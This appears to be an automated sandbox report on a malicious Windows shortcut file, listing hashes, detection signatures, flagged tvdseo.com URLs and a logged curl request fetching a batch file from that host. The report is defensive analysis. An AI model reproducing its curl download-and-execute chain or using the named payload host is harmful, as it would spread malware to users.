Windows Analysis Report
document.lnk.download.lnk

Overview

General Information

Sample name: document.lnk.download.lnk
Analysis ID: 1562561
MD5: 504d8898a97dda2963425df8c5a04118
SHA1: 0554cf0e2137e4a925e9137b9330491361c77011
SHA256: 7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
Tags: Compilazione, protetti, copyright, lnk, user-JAMESWT_MHT

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

AV Detection

Source: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batS Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-store-ios/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/about/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/comments/feed/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-chplay/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/phan-mem/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/url-short-short-link/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batD Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/app/ShemaTuyenDung.php Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-tiktok/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-lazada/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/cart-2/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/remove-background-xoa-nen-anh-free/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#organization Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-youtube/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver= Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/tin-hoc-ab/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bate Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-tmdt/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php?rsd Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/iq-vo-cuc/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bat Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4); Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-instagram/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#website Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-facebook/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/thongtinhay/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-fanpage/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/my-account-2/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-google-map/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-shoppe/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#/schema/logo/image/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0 Avira URL Cloud: Label: phishing
Source: Submitted Sample Integrated Neural Analysis Model: Matched 93.2% probability
Source: document.lnk.download.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /file/quan.bat HTTP/1.1Host: tvdseo.comUser-Agent: curl/7.83.1Accept: */*
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: SEO TVD"},"image":{"@id":"https://tvdseo.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/102126481779000"]}]}</script> equals www.facebook.com (Facebook)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg"><span style="font-size: 15px;">Youtube D equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg"><span style="font-size: 15px;">Youtube Tr equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <p><iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Ftvdseo&tabs=timeline&width=500&height=500&small_header=false&adapt_container_width=false&hide_cover=false&show_facepile=true&appId=270453733610848" width="500" height="500" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share"></iframe></p> equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: tvdseo.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:01:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.2.15expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-Encodingplatform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83335fdaa0422b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://api.w.org/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://congdonginan.vn/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://gmpg.org/xfn/11
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://gravatar.com/dungk396
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/Badges/DMCABadgeHelper.min.js
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/Badges/dmca_protected_sml_120l.png?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://marketing.tvdseo.com/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3Avi
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://schema.org
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#/schema/logo/image/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#organization
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#website
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/?s=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/about/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/app/ShemaTuyenDung.php
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/cart-2/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/dich-vu/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/hocseo/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/phan-mem/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/thongtinhay/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/tin-hoc-ab/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/wiki/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/comments/feed/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-chplay/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-store-ios/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-facebook/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-fanpage/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-google-map/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-instagram/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-lazada/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-shoppe/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tiki/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tmdt/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-tiktok/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-website/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-youtube/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/feed/
Source: curl.exe, 00000002.00000002.1293018592.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp, document.lnk.download.lnk String found in binary or memory: https://tvdseo.com/file/quan.bat
Source: curl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.batD
Source: curl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.batS
Source: curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.bate
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/iq-vo-cuc/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/my-account-2/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/my-account-2/lost-password/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/remove-background-xoa-nen-anh-free/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/url-short-short-link/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-600x251.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Italic.ttf
